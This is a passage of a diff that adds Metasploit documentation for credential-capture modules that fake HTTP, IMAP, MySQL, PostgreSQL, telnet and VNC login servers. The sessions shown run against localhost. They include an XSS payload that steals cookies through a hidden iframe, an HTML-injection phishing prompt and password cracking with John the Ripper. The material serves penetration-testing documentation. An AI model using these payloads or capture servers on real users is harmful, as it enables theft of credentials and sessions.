IHGot8oniVKes7yK0w8GSr0LeJgH23QMf/N0SZlF6BRc0GELAC7qPa9VJ8HPYYVb
|
||||
O/VaqXMy83y7YuSh6QlP/DksHt0W0rfvcM36ypHiZ3LIbaz8VuAUyIU5Qa6G+TNv
|
||||
wClhQnaX3TLN0kk31pAwwuSRNvSYvmUih4HAeN29IJyoiXH+GEjw7wBbm9dkbU1D
|
||||
I71zSZyO/Tfi/2SwDwaTKCucW7tUEd9ey6AU5hB6jGpc9N7rMYqV82mLogsXGaRD
|
||||
Wh/tt9hghGWAX3MfD7EebQqYr4vQssoisU62ct4DtCrNAgMBAAGjUzBRMB0GA1Ud
|
||||
DgQWBBR+MfL8LopA4OaIRLGK1gof3u+PIDAfBgNVHSMEGDAWgBR+MfL8LopA4OaI
|
||||
RLGK1gof3u+PIDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQBe
|
||||
IGmZr3wlO32b25qj/4qB7ewukwF6uaS4OQh4VLlUk8uYsqoGfvehAaNNJsu1oKO5
|
||||
XpShHeyEkpwzgx0mdCmQSB3JKseFYuZTgP9GP00EXuHYl2V+quPFN17fq0AgYN6K
|
||||
TFDwzYbhWyFGz7k++i23w0/dwvL2dLH+bgdHYU49rhlZIAu7PgbyIuhP+M2ltcjt
|
||||
NDO8po38u2ba52E56abfg0ZlFBqsua2s1TPHIyQ9iovTPMg1E5UTTGebaN6/BaMh
|
||||
Oj6N43ld9EONST6BhP3v1buoWHi1FMouocrUkUDuahiHoLlK4ERSUrb4uNnwko24
|
||||
WdNCCmA8APA1qf2BYVqs
|
||||
-----END CERTIFICATE-----
|
||||
msf5 > use auxiliary/server/capture/http_basic
|
||||
msf5 auxiliary(server/capture/http_basic) > set ssl true
|
||||
ssl => true
|
||||
msf5 auxiliary(server/capture/http_basic) > set srvport 443
|
||||
srvport => 443
|
||||
msf5 auxiliary(server/capture/http_basic) > set sslcert /root/metasploit-framework/selfsigned.pem
|
||||
sslcert => /root/metasploit-framework/selfsigned.pem
|
||||
msf5 auxiliary(server/capture/http_basic) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
msf5 auxiliary(server/capture/http_basic) >
|
||||
[*] Using URL: https://0.0.0.0:443/4w0tML
|
||||
[*] Local IP: https://192.168.2.117:443/4w0tML
|
||||
[*] Server started.
|
||||
[+] 127.0.0.1 - Credential collected: "admin:password123" => /4w0tML
|
||||
```
|
||||
|
||||
Clients:
|
||||
|
||||
```
|
||||
root@kali:~# curl -k --user admin:password123 https://127.0.0.1/4w0tML
|
||||
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|
||||
<html><head>
|
||||
<title>404 Not Found</title>
|
||||
</head><body>
|
||||
<h1>Not Found</h1>
|
||||
<p>The requested URL was not found on this server.</p>
|
||||
<hr>
|
||||
<address>Apache/2.2.9 (Unix) Server at Port 443</address>
|
||||
</body></html>
|
||||
```
|
||||
|
||||
### HTML Injection Social Engineering
|
||||
|
||||
In this scenario, we're able to inject HTML (but not script) into a website. We'll inject an `iframe`
|
||||
that will load our basic authentication website. This payload will pop-up a login box, with the REALM (title)
|
||||
set to the website, which will hopefully trick a user into entering their credentials.
|
||||
**The following scenario is a demonstration, no actual vulnerability was identified, or tested.
|
||||
The HTML was simply edited in the local browser.**
|
||||
|
||||
HTML Payload Injected:
|
||||
|
||||
```html
|
||||
<iframe width="0" height="0" src="http://127.0.0.1/"></iframe>
|
||||
```
|
||||
|
||||
Server:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/server/capture/http_basic
|
||||
msf5 auxiliary(server/capture/http_basic) > set uripath '/'
|
||||
uripath => /
|
||||
msf5 auxiliary(server/capture/http_basic) > set REALM "Wordpress.com Login"
|
||||
REALM => Wordpress.com Login
|
||||
msf5 auxiliary(server/capture/http_basic) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
msf5 auxiliary(server/capture/http_basic) >
|
||||
[*] Using URL: http://0.0.0.0:80/
|
||||
[*] Local IP: http://192.168.2.117:80/
|
||||
[*] Server started.
|
||||
[*] Sending 401 to client 127.0.0.1
|
||||
[+] 127.0.0.1 - Credential collected: "metasploit_blog:ms08-0sK1NG!" => /
|
||||
```
|
||||
|
||||
Client:
|
||||
|
||||
![Injected Payload](https://user-images.githubusercontent.com/752491/48039039-326e1880-e141-11e8-9971-d9c88081d0df.png)
|
||||
|
||||
### XSS Cookie Theft
|
||||
|
||||
In this scenario, we're able to inject JavaScript into a website. We'll first get the user's cookie, then with jQuery
|
||||
pull the username from the `username` field. Because the cookie may contain fields break URI parsing (like `@`)
|
||||
we use `btoa` to base64 encode the cookie. Next we'll write an `iframe`
|
||||
that will silently attempt a login to our basic authentication website.
|
||||
**The following scenario is a demonstration, no actual vulnerability was identified, or tested.
|
||||
The HTML was simply edited in the local browser.**
|
||||
|
||||
Payload:
|
||||
|
||||
```html
|
||||
<script>
|
||||
var cookie = document.cookie;
|
||||
var username = $('#username').text();
|
||||
document.write('<iframe width="0" height="0" src="http://' + username + ':' + btoa(cookie) + '@127.0.0.1/"></iframe>');
|
||||
</script>
|
||||
```
|
||||
|
||||
Sever:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/server/capture/http_basic
|
||||
msf5 auxiliary(server/capture/http_basic) > set uripath '/'
|
||||
uripath => /
|
||||
msf5 auxiliary(server/capture/http_basic) > set REALM "Login"
|
||||
REALM => Login
|
||||
msf5 auxiliary(server/capture/http_basic) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
msf5 auxiliary(server/capture/http_basic) >
|
||||
[*] Using URL: http://0.0.0.0:80/
|
||||
[*] Local IP: http://192.168.2.117:80/
|
||||
[*] Server started.
|
||||
[*] Sending 401 to client 127.0.0.1
|
||||
[+] 127.0.0.1 - Credential collected: "h00die:R1VDPUFRRUJBUUZicVNGY2owSWVBQVJuJnM9QVFBQUFFUmFpakN4Jmc9VzZmYkdROyB1Y3M9bG5jdD0xNTM3NzI3MjQ4OyBjbXA9dD0xNTQxNDY4ODQ1Jmo9MDsgZmxhc2hfZW5hYmxlZD0wOyBhcGVhZj10ZC1hcHBsZXQtc3RyZWFtPSU3QiUyMnRtcGwlMjIlM0ElMjJpdGVtcyUyMiUyQyUyMmx2JTIyJTNBMTU0MTQ3MDY0NjI4OCU3RDsgSFA9MTsgQj1jN2tvYTYxZDY5dHBzJmI9MyZzPTVy" => /
|
||||
```
|
||||
|
||||
Decoding the cookie:
|
||||
|
||||
```
|
||||
msf5 auxiliary(server/capture/http_basic) > irb
|
||||
[*] Starting IRB shell...
|
||||
[*] You are in auxiliary/server/capture/http_basic
|
||||
|
||||
>> Base64.decode64('R1VDPUFRRUJBUUZicVNGY2owSWVBQVJuJnM9QVFBQUFFUmFpakN4Jmc9VzZmYkdROyB1Y3M9bG5jdD0xNTM3NzI3MjQ4OyBjbXA9dD0xNTQxNDY4ODQ1Jmo9MDsgZmxhc2hfZW5hYmxlZD0wOyBhcGVhZj10ZC1hcHBsZXQtc3RyZWFtPSU3QiUyMnRtcGwlMjIlM0ElMjJpdGVtcyUyMiUyQyUyMmx2JTIyJTNBMTU0MTQ3MDY0NjI4OCU3RDsgSFA9MTsgQj1jN2tvYTYxZDY5dHBzJmI9MyZzPTVy')
|
||||
=> "GUC=AQEBAAFbqSFcj0IeBARn&s=AQADAERaieCx&g=W2fb9Q; ucs=lnct=1537714242; cmp=t=1247468145&j=0; flash_enabled=0; apeaf=td-applet-stream=%7B%22tmpl%22%3A%22items%22%2C%22lv%22%3A1541470698788%7D; HP=1; B=c7koa55d69tbs&b=3&s=5r"
|
||||
```
|
|
@ -0,0 +1,174 @@
|
|||
This module creates a mock IMAP server which accepts credentials.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use auxiliary/server/capture/imap```
|
||||
3. Do: ```run```
|
||||
|
||||
## Options
|
||||
|
||||
**BANNER**
|
||||
|
||||
The Banner which should be displayed. Default is `IMAP4`.
|
||||
Some notable banners to emulate:
|
||||
|
||||
* `Dovecot ready.`
|
||||
* `IMAP 4 Server (IMail 9.23)`
|
||||
* `mailserver Cyrus IMAP4 v2.2.13-Debian-2.2.13-19 server ready`
|
||||
* `Welcome to Binc IMAP v1.3.4 Copyright (C) 2002-2005 Andreas Aardal Hanssen at 2018-11-08 11:17:35 +1100`
|
||||
* `The Microsoft Exchange IMAP4 service is ready.`
|
||||
* `Microsoft Exchange Server 2003 IMAP4rev1 server versino 6.5.7638.1 (domain.local) ready.`
|
||||
|
||||
**SSL**
|
||||
|
||||
Boolean if SSL should be used, making this Secure IMAP. Secure IMAP is typically run on port 993. If `SSLCert` is not set, a certificate
|
||||
will be automatically generated. Default is `False`.
|
||||
|
||||
**SSLCert**
|
||||
|
||||
File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
|
||||
generated. Default is ``.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### IMAP Emulating Microsoft Exchange with Telnet Client
|
||||
|
||||
Server:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/server/capture/imap
|
||||
msf5 auxiliary(server/capture/imap) > set banner "The Microsoft Exchange IMAP4 service is ready."
|
||||
banner => The Microsoft Exchange IMAP4 service is ready.
|
||||
msf5 auxiliary(server/capture/imap) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
msf5 auxiliary(server/capture/imap) >
|
||||
[*] Started service listener on 0.0.0.0:143
|
||||
[*] Server started.
|
||||
[*] IMAP LOGIN 127.0.0.1:42972 metasploit@documentation.com / rapid7#1
|
||||
```
|
||||
|
||||
Client:
|
||||
|
||||
```
|
||||
root@kali:~# telnet 127.0.0.1 143
|
||||
Trying 127.0.0.1...
|
||||
Connected to 127.0.0.1.
|
||||
Escape character is '^]'.
|
||||
* OK The Microsoft Exchange IMAP4 service is ready.
|
||||
01 LOGIN metasploit@documentation.com rapid7#1
|
||||
quit
|
||||
Connection closed by foreign host.
|
||||
```
|
||||
|
||||
### Secure IMAP with Self-Signed Certificate and Alpine client
|
||||
|
||||
Server:
|
||||
|
||||
```
|
||||
msf5 > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
|
||||
[*] exec: openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
|
||||
|
||||
Generating a RSA private key
|
||||
.................................................................................................+++++
|
||||
...................+++++
|
||||
writing new private key to 'key.pem'
|
||||
-----
|
||||
You are about to be asked to enter information that will be incorporated
|
||||
into your certificate request.
|
||||
What you are about to enter is what is called a Distinguished Name or a DN.
|
||||
There are quite a few fields but you can leave some blank
|
||||
For some fields there will be a default value,
|
||||
If you enter '.', the field will be left blank.
|
||||
-----
|
||||
Country Name (2 letter code) [AU]:
|
||||
State or Province Name (full name) [Some-State]:
|
||||
Locality Name (eg, city) []:
|
||||
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
|
||||
Organizational Unit Name (eg, section) []:
|
||||
Common Name (e.g. server FQDN or YOUR name) []:
|
||||
Email Address []:
|
||||
msf5 > cat key.pem certificate.pem > selfsigned.pem
|
||||
[*] exec: cat key.pem certificate.pem > selfsigned.pem
|
||||
|
||||
msf5 > cat /root/metasploit-framework/selfsigned.pem
|
||||
[*] exec: cat /root/metasploit-framework/selfsigned.pem
|
||||
|
||||
-----BEGIN PRIVATE KEY-----
|
||||
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDAXME8r2vEUH7B
|
||||
Kelkt9iC4tTozOq0wJAjsACLCDcNoD4hUH16wy4Uf4SD3ZsEaL0YA0GU2ZgOo2ud
|
||||
USBpOo8h9FEGtRrAAeSl7Z3XaBnuB7UmVMrnUVZxlaYi84JcopcTOs6KZ5VXddia
|
||||
PEkE5G3jaCwOIqHk+c8Qk5b43HQbkj2jr4051gHeWP0UgBEy1TVPKtoywtyK1b5H
|
||||
QhX7MYVNge8lQL/xJnBrjMDqIQqc41lCI73EPCuGZ7zB06xBsgyW/DTgQkprX+Qe
|
||||
DVKtz8ZChLSqSwmz/5yFttRyZlDuXA7Kozhdj8obRAjzK/gKj89WsX/s2KUbq2GY
|
||||
pdMpLh7/AgMBAAECggEBALCtQKpdMCzqBdGijgP8u3ZToluDwlprtregco8/51iz
|
||||
gf0VMXqsg8k96dc3laZyEKNackSlqfxf6npeRdeAenAkNrtjYYNS+c/Qs7Vhntc5
|
||||
6w6euJHG6g9+9E2LvIMarolx7LvAMbFXwq6+ig5dQ/Sm/DerZWiqbJ18ASDnUhjz
|
||||
G1Y8/Idy4WutPZD/0JEQ+5VnHb+Mt3a7yYKhDsmUEzVh5xoWJab9dwfwCnoOb32T
|
||||
oLOLLsqUbAK8ZiQ4MwkbGJ5kw8H24wVmI+7BbuRacW2tIIt6Z+vEoLdof0TsuJWo
|
||||
87ZbCYYeTysIgBIdLNRiGGxz43SOqBBGh8sreyyACdECgYEA6Ubs1Klw3TViABke
|
||||
1JqkWelZi6mtsyUHJt/eChjMzgg5vGVuYB/sCc+BObjETbfnvuV0Ub4cxbUCF3wL
|
||||
qvrJNTd+yU7JJ7IP63B2lS3aNlAsLRb59SkjDYyym1OeUAHKkGp8oICSq96X3Xtu
|
||||
KUZnDdh2UuoMzmEoAHoDoc+SC/cCgYEA0xmQ+qDJ4l3JRH/IPMPe9XD90WFJFhvF
|
||||
GzGSM8qqpg6N2xhlzQiM6+I4EEh9iNnCOYmvw9leGNRpIjFjAhv5ntlG3LudAEpd
|
||||
Ml/hhrfRB7KOopiqzK7oVCUv5f5rmvYdL4c2FC+VGxnhWUP6MARUHag/1DgszMs7
|
||||
wSlwcbKi8zkCgYBMvRc1khPdwSze6WSZ/dEo/rmFVykb8Idcw3Iwkh31fQE5N4jK
|
||||
uFWWmJtjGKQDCQeEZckRBuBCLZxli1nvQhakmf/sSy2jEFFqWxG3W2EYUuFlZ9SM
|
||||
UJ8GWw16SVSf7ybqwQ0EY6dcQJpmsq73hwBprpamCfZygcV9+qVtOnJJ2wKBgBKY
|
||||
ZPH+6em70zfqfawEoQZD3sfr5vFAnvtHQZa4WpHoJEzReF44S5mXwtKEYDKG5BoH
|
||||
a+k3o5dSVrSBXzRXXITGpPxatnjJFC6UzZv9YzdnXjMqeZkwKx0GbZK396id13JR
|
||||
Wc0rZ9oMTJJ9b3N9Xh+Cq6S5EhE0Md5RFSuezcXZAoGBAJOMfjbwobOCYm6K8PyV
|
||||
p89gbnDOj7FHCg2JPa9/dii6pBRHXeUfORp00GfN0oAjjJo14SmOw58zh1mF1VcA
|
||||
BQhTK9TO4GXIEZDiYt9EmiH1VO58I8vUecBcbelirumGOP+dBiBy/C8YzFJRhAis
|
||||
eAGSi8F+qcJaS3VDRGEC9zcK
|
||||
-----END PRIVATE KEY-----
|
||||
-----BEGIN CERTIFICATE-----
|
||||
MIIDazCCAlOgAwIBAgIUMlkpAG2tXodgLSrIf/xOuA9z8PwwDQYJKoZIhvcNAQEL
|
||||
BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
|
||||
GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xODExMDkwMTI3MTRaFw0xOTEx
|
||||
MDkwMTI3MTRaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
|
||||
HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB
|
||||
AQUAA4IBDwAwggEKAoIBAQDAXME8r2vEUH7BKelkt9iC4tTozOq0wJAjsACLCDcN
|
||||
oD4hUH16wy4Uf4SD3ZsEaL0YA0GU2ZgOo2udUSBpOo8h9FEGtRrAAeSl7Z3XaBnu
|
||||
B7UmVMrnUVZxlaYi84JcopcTOs6KZ5VXddiaPEkE5G3jaCwOIqHk+c8Qk5b43HQb
|
||||
kj2jr4051gHeWP0UgBEy1TVPKtoywtyK1b5HQhX7MYVNge8lQL/xJnBrjMDqIQqc
|
||||
41lCI73EPCuGZ7zB06xBsgyW/DTgQkprX+QeDVKtz8ZChLSqSwmz/5yFttRyZlDu
|
||||
XA7Kozhdj8obRAjzK/gKj89WsX/s2KUbq2GYpdMpLh7/AgMBAAGjUzBRMB0GA1Ud
|
||||
DgQWBBRezbFZBumaJ/MViZqqbllYrPomMzAfBgNVHSMEGDAWgBRezbFZBumaJ/MV
|
||||
iZqqbllYrPomMzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQAd
|
||||
Smkooa2nhdDdu3/uHX8vhDC0ns5qotgd0YKGkj/QyzNP+ruP1cyq/q67zand/Eq8
|
||||
gF+lHk+pX8GM0WvI7ypgrK956YCdmh3DULBFDu5RxVABFWrGedfNy6TKLTps0PXR
|
||||
9mdB/HK0Msr6Mh/o5PkUhb1fx0T3NUwF1EFte7Nsq10Mq+hYVnEqDeEGMlb73frJ
|
||||
729tCjNpFoLGdlgEcAEFelAujV0w4oj35CE2Fh3b+4wupDiulfgg9E7FtvS9xK0P
|
||||
l/m7Kka0n7lXnKo+IFSJ0dTooBvwaV7+4tEGuHxWJsNO+2aex9qFCuDUdBFxyWyK
|
||||
uBVlsY6F7EjTfWpxwyVP
|
||||
-----END CERTIFICATE-----
|
||||
msf5 > use auxiliary/server/capture/imap
|
||||
msf5 auxiliary(server/capture/imap) > set ssl true
|
||||
ssl => true
|
||||
msf5 auxiliary(server/capture/imap) > set sslcert /root/metasploit-framework/selfsigned.pem
|
||||
sslcert => /root/metasploit-framework/selfsigned.pem
|
||||
msf5 auxiliary(server/capture/imap) > set srvport 993
|
||||
srvport => 993
|
||||
msf5 auxiliary(server/capture/imap) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
msf5 auxiliary(server/capture/imap) >
|
||||
[*] Started service listener on 0.0.0.0:993
|
||||
[*] Server started.
|
||||
[+] IMAP LOGIN 127.0.0.1:59024 "johndoe" / "p455w0rd"
|
||||
```
|
||||
|
||||
Clients:
|
||||
|
||||
```
|
||||
root@kali:~# cat ~/.muttrc
|
||||
set spoolfile="imaps://johndoe:p455w0rd@127.0.0.1/INBOX"
|
||||
set folder="imaps://127.0.0.1/INBOX"
|
||||
set record="=Sent"
|
||||
set postponed="=Drafts"
|
||||
|
||||
root@kali:~# mutt
|
||||
```
|
||||
|
||||
The user is prompted about the invalid certificate, and the client gets stuck at "Logging in...", however
|
||||
it doesn't matter since the credentials have already been sent.
|
|
@ -0,0 +1,72 @@
|
|||
This module creates a mock MySQL server which accepts credentials. Upon receiving a login attempt, an `ERROR 1045 (2800): Access denied` error is thrown.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use auxiliary/server/capture/mysql```
|
||||
3. Do: ```run```
|
||||
|
||||
## Options
|
||||
|
||||
**CHALLENGE**
|
||||
|
||||
The MySQL 16 byte challenge used in the authentication. Default is `112233445566778899AABBCCDDEEFF1122334455`.
|
||||
|
||||
**JOHNPWFILE**
|
||||
|
||||
Write a file containing a John the Ripper format for cracking the credentials. Default is ``.
|
||||
|
||||
**CAINPWFILE**
|
||||
|
||||
Write a file containing a Cain & Abel format for cracking the credentials. Default is ``.
|
||||
|
||||
**SRVVERSION**
|
||||
|
||||
The MySQL version to print in the login banner. Default is `5.5.16`.
|
||||
|
||||
**SSL**
|
||||
|
||||
Boolean if SSL should be used. Default is `False`.
|
||||
|
||||
**SSLCert**
|
||||
|
||||
File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
|
||||
generated. Default is ``.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### MySQL with MySQL Client and JTR Cracking
|
||||
|
||||
Server:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/server/capture/mysql
|
||||
msf5 auxiliary(server/capture/mysql) > set johnpwfile /tmp/mysql.logins
|
||||
johnpwfile => /tmp/mysql.logins
|
||||
msf5 auxiliary(server/capture/mysql) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
msf5 auxiliary(server/capture/mysql) >
|
||||
[*] Started service listener on 0.0.0.0:3306
|
||||
[*] Server started.
|
||||
[+] 127.0.0.1:59604 - User: admin; Challenge: 112233445566778899aabbccddeeff1122334455; Response: 46677c2d9cac93da328c4321060c125db759925e
|
||||
```
|
||||
|
||||
Client:
|
||||
|
||||
```
|
||||
root@kali:~# mysql -u admin -ppassword1 -h 127.0.0.1
|
||||
ERROR 1045 (28000): Access denied for user 'admin'@'127.0.0.1' (using password: YES)
|
||||
```
|
||||
|
||||
JTR:
|
||||
|
||||
```
|
||||
root@kali:~# john /tmp/mysql.logins_mysqlna
|
||||
Using default input encoding: UTF-8
|
||||
Loaded 1 password hashes with no different salts (mysqlna, MySQL Network Authentication [SHA1 32/64])
|
||||
Press 'q' or Ctrl-C to abort, almost any other key for status
|
||||
password1 (admin)
|
||||
1g 0:00:00:00 DONE 2/3 (2018-11-08 21:05) 20.00g/s 16800p/s 16800c/s 16800C/s password1
|
||||
Use the "--show" option to display all of the cracked passwords reliably
|
||||
Session completed
|
||||
```
|
|
@ -0,0 +1,43 @@
|
|||
This module creates a mock PostgreSQL server which accepts credentials. Upon receiving a login attempt, a
|
||||
`FATAL: password authentication failed for user` error is thrown.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use auxiliary/server/capture/postgresql```
|
||||
3. Do: ```run```
|
||||
|
||||
## Options
|
||||
|
||||
**SSL**
|
||||
|
||||
Boolean if SSL should be used. Default is `False`.
|
||||
|
||||
**SSLCert**
|
||||
|
||||
File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
|
||||
generated. Default is null.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### PostgreSQL Server and psql Client
|
||||
|
||||
Server:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/server/capture/postgresql
|
||||
msf5 auxiliary(server/capture/postgresql) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
|
||||
[*] Started service listener on 0.0.0.0:5432
|
||||
[*] Server started.
|
||||
[+] PostgreSQL LOGIN 127.0.0.1:49882 msf / pwn_all_da_tings / msf
|
||||
```
|
||||
|
||||
Client:
|
||||
|
||||
```
|
||||
root@kali:~# psql -U msf -h 127.0.0.1
|
||||
Password for user msf:
|
||||
psql: FATAL: password authentication failed for user "msf"
|
||||
```
|
|
@ -0,0 +1,73 @@
|
|||
This module creates a mock print server which accepts print jobs.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use auxiliary/server/capture/printjob_capture```
|
||||
3. Do: ```set MODE [mode]```
|
||||
4. Do: ```run```
|
||||
|
||||
## Options
|
||||
|
||||
**FORWARD**
|
||||
|
||||
After the print job is captured, should it be forwarded to another printer. Default is `false`.
|
||||
|
||||
**RPORT**
|
||||
|
||||
If `forward` is set, this is the port of the remote printer to forward the print job to. Default is `9100`.
|
||||
|
||||
**RHOST**
|
||||
|
||||
If `forward` is set, this is the IP of the remote printer to forward the print job to.
|
||||
|
||||
**METADATA**
|
||||
|
||||
If set to `true` the print job metadata will be printed to screen. Default is `true`.
|
||||
|
||||
**MODE**
|
||||
|
||||
Set the printer mode. RAW format, which typically runs on port `9100`, is a raw TCP data stream that would send to a printer.
|
||||
`LPR`, Line Printer remote, which typically runs on port 515, is the newer more widely accepted standard. Default is `RAW`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Capturing a RAW print job
|
||||
|
||||
Server:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/server/capture/printjob_capture
|
||||
msf5 auxiliary(server/capture/printjob_capture) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
|
||||
[*] Starting Print Server on 0.0.0.0:9100 - RAW mode
|
||||
[*] Started service listener on 0.0.0.0:9100
|
||||
[*] Server started.
|
||||
msf5 auxiliary(server/capture/printjob_capture) > [*] Printjob Capture Service: Client connection from 127.0.0.1:44678
|
||||
[*] Printjob Capture Service: Client 127.0.0.1:44678 closed connection after 249 bytes of data
|
||||
[-] Unable to detect printjob type, dumping complete output
|
||||
[+] Incoming printjob - Unnamed saved to loot
|
||||
[+] Loot filename: /root/.msf4/loot/20181117205902_default_127.0.0.1_prn_snarf.unknow_003464.bin
|
||||
|
||||
msf5 auxiliary(server/capture/printjob_capture) > cat /root/.msf4/loot/20181117205902_default_127.0.0.1_prn_snarf.unknow_003464.bin
|
||||
[*] exec: cat /root/.msf4/loot/20181117205902_default_127.0.0.1_prn_snarf.unknow_003464.bin
|
||||
|
||||
PRETTY_NAME="Kali GNU/Linux Rolling"
|
||||
NAME="Kali GNU/Linux"
|
||||
ID=kali
|
||||
VERSION="2018.4"
|
||||
VERSION_ID="2018.4"
|
||||
ID_LIKE=debian
|
||||
ANSI_COLOR="1;31"
|
||||
HOME_URL="https://www.kali.org/"
|
||||
SUPPORT_URL="https://forums.kali.org/"
|
||||
BUG_REPORT_URL="https://bugs.kali.org/"
|
||||
```
|
||||
|
||||
Client:
|
||||
|
||||
```
|
||||
root@kali:~# cat /etc/os-release | nc 127.0.0.1 9100
|
||||
^C
|
||||
```
|
|
@ -0,0 +1,57 @@
|
|||
This module creates a mock telnet server which accepts credentials. Upon receiving a login attempt, a `Login failed` error is thrown.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use auxiliary/server/capture/telnet```
|
||||
3. Do: ```run```
|
||||
|
||||
## Options
|
||||
|
||||
**BANNER**
|
||||
|
||||
The Banner which should be displayed. Default is empty, which will display `Welcome`.
|
||||
|
||||
**SSL**
|
||||
|
||||
Boolean if SSL should be used. Default is `False`.
|
||||
|
||||
**SSLCert**
|
||||
|
||||
File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
|
||||
generated. Default is ``.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Telnet Server and Client
|
||||
|
||||
Server:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/server/capture/telnet
|
||||
msf5 auxiliary(server/capture/telnet) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
msf5 auxiliary(server/capture/telnet) >
|
||||
[*] Started service listener on 0.0.0.0:23
|
||||
[*] Server started.
|
||||
[+] TELNET LOGIN 127.0.0.1:40016 root / <3@wvu_is_my_hero
|
||||
```
|
||||
|
||||
Client:
|
||||
|
||||
```
|
||||
root@kali:~# telnet 127.0.0.1
|
||||
Trying 127.0.0.1...
|
||||
Connected to 127.0.0.1.
|
||||
Escape character is '^]'.
|
||||
|
||||
Welcome
|
||||
|
||||
Login: root
|
||||
Password: <3@wvu_is_my_hero
|
||||
|
||||
|
||||
Login failed
|
||||
|
||||
Connection closed by foreign host.
|
||||
```
|
|
@ -0,0 +1,69 @@
|
|||
This module creates a mock VNC server which accepts credentials. Upon receiving a login attempt, an `Authentication failure` error is thrown.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use auxiliary/server/capture/vnc```
|
||||
3. Do: ```run```
|
||||
|
||||
## Options
|
||||
|
||||
**CHALLENGE**
|
||||
|
||||
The 16 byte challenge used in the authentication. Default is `00112233445566778899aabbccddeeff`.
|
||||
|
||||
**JOHNPWFILE**
|
||||
|
||||
Write a file containing a John the Ripper format for cracking the credentials. Default is ``.
|
||||
|
||||
**SSL**
|
||||
|
||||
Boolean if SSL should be used. Default is `False`.
|
||||
|
||||
**SSLCert**
|
||||
|
||||
File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
|
||||
generated. Default is ``.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### VNC with vncviewer and JTR Cracking
|
||||
|
||||
Server, Client:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/server/capture/vnc
|
||||
msf5 auxiliary(server/capture/vnc) > use auxiliary/server/capture/vnc
|
||||
msf5 auxiliary(server/capture/vnc) > set johnpwfile /tmp/john
|
||||
johnpwfile => /tmp/john
|
||||
msf5 auxiliary(server/capture/vnc) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
msf5 auxiliary(server/capture/vnc) >
|
||||
[*] Started service listener on 0.0.0.0:5900
|
||||
[*] Server started.
|
||||
|
||||
msf5 auxiliary(server/capture/vnc) > vncviewer 127.0.0.1
|
||||
[*] exec: vncviewer 127.0.0.1
|
||||
|
||||
Connected to RFB server, using protocol version 3.7
|
||||
Performing standard VNC authentication
|
||||
Password:
|
||||
Authentication failure
|
||||
|
||||
[+] 127.0.0.1:40240 - Challenge: 00112233445566778899aabbccddeeff; Response: b7b9c87777661a7a2299733209bfdfce
|
||||
```
|
||||
|
||||
John the Ripper (JTR) Cracker:
|
||||
|
||||
```
|
||||
msf5 auxiliary(server/capture/vnc) > john /tmp/john_vnc
|
||||
[*] exec: john /tmp/john_vnc
|
||||
|
||||
Using default input encoding: UTF-8
|
||||
Loaded 1 password hash (VNC [DES 32/64])
|
||||
Press 'q' or Ctrl-C to abort, almost any other key for status
|
||||
password (?)
|
||||
1g 0:00:00:00 DONE 2/3 (2018-11-11 20:38) 25.00g/s 75.00p/s 75.00c/s 75.00C/s password
|
||||
Use the "--show" option to display all of the cracked passwords reliably
|
||||
Session completed
|
||||
```
|
|
@ -0,0 +1,78 @@
|
|||
## Intro
|
||||
|
||||
This module exploits a stack buffer overflow in `fingerd` on 4.3BSD.
|
||||
This vulnerability was exploited by the Morris worm in 1988-11-02.
|
||||
Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.
|
||||
|
||||
## Setup
|
||||
|
||||
A Docker environment for 4.3BSD on VAX is available at
|
||||
<https://github.com/wvu/ye-olde-bsd>.
|
||||
|
||||
